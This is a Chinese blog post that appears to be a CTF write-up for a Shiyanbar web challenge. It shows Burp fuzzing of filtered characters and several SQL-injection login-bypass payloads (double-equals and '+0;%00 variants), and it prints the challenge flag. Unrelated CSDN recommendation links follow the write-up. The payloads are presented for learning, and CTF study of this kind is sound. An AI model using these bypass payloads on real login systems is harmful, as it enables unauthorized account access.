实验吧-登陆一下好吗

最新推荐文章于 2021-01-12 01:07:27 发布
最新推荐文章于 2021-01-12 01:07:27 发布
阅读量134 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingchenldl/article/details/84576439
版权

登陆一下好吗

原题链接

http://ctf5.shiyanbar.com/web/wonderkun/web/index.html

分析

burp fuzz 查出过滤字符
过滤字符有:

(空格) union select || or /**/ # --

猜测sql语句类似于

select * from user where username='$_POST[username]' and password='$_POST[password]'

这里学到了一种双等绕过,也是利用php弱类型的特点吧。

false == null

username = xx'='
password = yy'='

这样源于据变成了

select * from user where username='xx'='' and password='yy'=''

由于等号的运算规则,我们从左网友理解这句sql

username='xx' -> false = '' -> true

另外,还看到其他解法:
利用mysql的数据转换的特性

select * from table where username=0; 
select * from table where username='a'+0;

这两句均会返回库中所有元组,就是说如果一个字符类型的变量接收到一个整形变量且值为0的时候,就会返回库中所有元组(第二句'a'+0会进行强制类型转换,最后结果还是0)
其次,mysql的注释符号除了-- + , # ,/**/之外,还有 ;%00
利用这两点,构造如下payload:

username=a'+0;%00&password=

但是这个方法,我没成功,就只是当学习一下吧

payload

  1. username='=' & password='='

  2. username=a'=' & password=b'='

  3. username='='0e123 & password='='0e123
    以上其实都是双等绕过的变形,都是利用php弱类型的特点和等号的逻辑运算

  4. username=a'+0%00 & password=''
    该方法虽然未成功,但是也是学习到一种思路。

flag

ctf{51d1bf8fb65a8c2406513ee8f52283e7}

知识点

sql语句,sql万能语句,php弱类型

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HCIE-Datacom V1.0 实验指导手册
05-19
本文是华为认证系列教程中的 HCIE-Datacom 实验指导手册,版本号为 V1.0。...该手册为 HCIE-Datacom 实验的指导手册,提供了实验的详细步骤和操作指南,帮助读者更好地掌握 HCIE-Datacom 实验的知识和技能。
实验吧-ctf-misc-附件资源
03-05
实验吧-ctf-misc-附件资源
国外BT下载网站
油管大树分享
09-12 9万+
国外BT下载网站WWW.SSYS2020.CN EZTV:http://eztv.it/ http://bittorrent.am/ http://www.sumotorrent.com/ http://www.monova.org/ KickAssTorrents:http://katcr.to/ TorrentDownloads:http://www.torrentdownloads.net/...
20个BT下载网站,BT种子网站
热门推荐
在路上
08-04 26万+
BT(BitTorrent简称,是一个文件分发协议)下载是P2P的典型应用之一,它带给网民的福利恐怕是无法估计的,我支持著作权保护,但更支持著作权人和用户之间的利益均衡,P2P分享只要不涉及不危害著作权人利益,完全可以找到一种合适的版权解决方案,所以,我非常鄙视那些为了商业利益而对P2P下载穷追猛打的媒体娱乐公司。别的就不多说了,下面是20个国内外常用的BT种子下载或分享站。 国外的十个BT
推荐10个常用的国外BT种子下载网站
心语家园 - www.xinyucn.cc
08-06 22万+
这些都是国外较为知名的BT种子下载站点,其上的资源一般是很丰富的。各位务必搜藏起来,总有它们派上用场的时候。 1. Mininova特点:东西比较多资格比较老,地球人都知道资格老的总能排第一位。 2. The Pirate Bay特点:东西比较多而且有中文,找东西方便,可惜速度有点慢。 3. IsoHunt特点:更新比较快,速度也不错。 4. Torrentz特点:这个网址比较好记,随...
# 解析bt文件_简洁飞速!不限速的BT种子&磁力链接下载软件AND高清电影BT网站推荐...
weixin_39966765的博客
01-12 1万+
关注公众号:教程姬,回复“BT” 获取今日资源。打卡!今天给大家介绍一款非常简洁实用的bt种子&磁力链接下载软件,教程姬测试能稳定在满速。软件的名字为“千鸟”,支持Android系统。千鸟的功能很简单,主页只有3部分:下载中、已下载、全部任务。没有广告和其他臃肿功能。通过下面的2个电影搜索网站来介绍如何找到你想要的蓝光电影并通过千鸟进行下载。喜欢就一键三连吧~BT吧以电影《千与...
实验二-FSK解调实验.pdf
03-21
实验二-FSK解调实验.pdf实验二-FSK解调实验.pdf实验二-FSK解调实验.pdf实验二-FSK解调实验.pdf实验二-FSK解调实验.pdf
IAT实验E-PRIME报告.doc
06-06
IAT实验E-PRIME报告
实验四-数据库接口实验.pdf
11-24
实验四-数据库接口实验.pdf
【2015沈阳现场A】
sxy201658506207的博客
12-01 245
题意:求个一个n 求2^n-1能被7整除得有多少个,(1,2,....n) 简单得同余方程 #include<bits/stdc++.h> #include <iostream> #include <cmath> #include <cstdio> #include <stdlib.h> #include <ctime> ...
Win8系统 M2 Build 7955 BT种子下载
欢迎光临 包国工作室
12-22 2353
Win8系统 运行环境:WinXP/win7/vista/ 软件语言:简体中文 软件类型:win7系统 - win8系统 授权方式:免费版 软件大小:2.47 GB Windows8系统汉化包,可以将Windows8微软官方英文版转为Windows8系统中文版,过程稍微复杂,本站提供Win8系统中文版详细教程。 下载地址Windows8系统汉化包中文版 http:/
DFS深度优先搜索
weixin_43719397的博客
12-07 127
蓝桥杯 ALGO-22 算法训练 数的划分 问题描述   将整数n分成k份,且每份不能为空,任意两份不能相同(不考虑顺序)。   例如:n=7,k=3,下面三种分法被认为是相同的。   1,1,5; 1,5,1; 5,1,1;   问有多少种不同的分法。 输入格式   n,k 输出格式   一个整数,即不同的分法 样例输入 7 3 样例输出 4 {四种分法为:1,1,5;1,2,4;1,3,3;2...
HDU-2612 Find a way
wrnge的博客
12-28 237
毒瘤数据。。。 1.KFC可以经过 2.可能有不能到达的KFC 解决1的方法,就是另外立一个ans数组,然后KFC的初值为-1,其他为0。只有当ans[i][j]>0,且view1[i][j]&&view2[i][j]的时候,才是真正两个人都到达的KFC。这个时候,遍历一遍,输出最小值即可。 解决2的方法,就是储存答案到ans数组后,继续遍历就完事了。。。 #include&...
Google Code Jam 2014 Qualification Round A
04-13 405
1、一个模拟题。。。看代码吧。。。 #include using namespace std; int a[10][10],b[20][2]; int main(){ freopen("A--small-attempt1.in","r",stdin); freopen("A--small-attempt1.out","w",stdout);     int T,fn,sn; sca
dJangoの初习1
心生于物而死于物
10-14 229
DJango是一个开源Web应用框架,由python写成的[MVC]框架. 1.首先创建项目 [code="python"]django-admin.py HelloWorld[/code] 或 [code="python"]django-admin startproject myDJProject[/code] 项目如果创建成功,将会呈现以下目录结构. ...
ConcurrentHashMap源码分析(JDK8版本)
xiaomin1991222的专栏
03-29 114
注:本文源码是JDK8的版本,与之前的版本有较大差异 ConcurrentHashMap是conccurrent家族中的一个类,由于它可以高效地支持并发操作,以及被广泛使用,经典的开源框架 Spring的底层数据结构就是使用ConcurrentHashMap实现的。与同是线程安全的老大哥HashTable相比,它已经更胜一筹,因此它 的锁更加细化,而不是像HashTable一样为几乎每个方法都...
【JZOJ5097】【GDOI2017 day1】取石子游戏
dance in th dark的博客
05-07 1140
Description经过了与中山大学学生处软磨硬泡之后,凡喵、叶妹、yzx 和图图终于成为了舍友。如果你不想和题面软摩硬 泡的话,请直接跳到加粗的部分开始读。 这道题目来源于宿舍中发生的一件小事。为了简明扼要地把这道题叙述清楚,对这个故事的内容进行了极大 的简化。如果想看这个题目的完整版本,凡喵很愿意提供给大家。详见随题目下发的文件。 这天叶妹去改 (san) 题 (guo) 目 (sha)
[leetcode]258. Add Digits
Brett
12-12 124
Given a non-negative integer num, repeatedly add all its digits until the result has only one digit. Example: Input: 38Output: 2 Explanation: The process is like: 3 + 8 = 11, 1 + 1 = 2. Since 2 ha...
数据通路实验tec-8
最新发布
12-22
数据通路实验tec-8是一种用于教学和研究的实验。该实验主要是为了让学生和研究人员可以深入了解数据通路的原理和运作方式。数据通路通常是指计算机系统中用于传输数据的一条路径,它包括了数据的输入、输出、存储和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值